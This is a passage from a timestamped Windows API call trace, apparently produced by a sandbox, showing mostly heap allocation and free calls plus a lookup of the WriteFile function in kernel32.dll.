hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0179.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0179.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0179.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.095] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0179.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0179.095] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0179.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0179.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0179.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0179.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0179.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b50 [0179.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0179.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0179.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0179.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0179.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0179.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0179.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0179.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1770 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0179.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0179.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0179.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0179.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0179.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0179.109] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0179.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0179.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0179.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0179.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0179.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0179.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0179.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0179.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0179.111] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0179.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0179.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0179.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.113] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0179.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0179.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bdb10 [0179.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bdb10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0179.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.113] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0179.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0179.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0179.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0179.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0179.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0179.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.114] HeapFree (in: hHeap=0x8a0000, 